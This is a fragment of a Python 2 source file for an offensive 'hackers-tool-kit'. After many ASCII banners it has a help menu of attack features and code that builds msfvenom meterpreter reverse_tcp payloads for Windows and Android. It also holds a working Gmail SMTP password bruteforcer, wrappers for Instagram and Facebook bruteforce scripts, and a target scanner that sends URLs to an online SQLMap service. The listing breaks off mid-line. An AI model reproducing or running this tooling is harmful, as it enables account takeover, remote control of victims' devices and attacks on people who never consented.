░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,19) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use 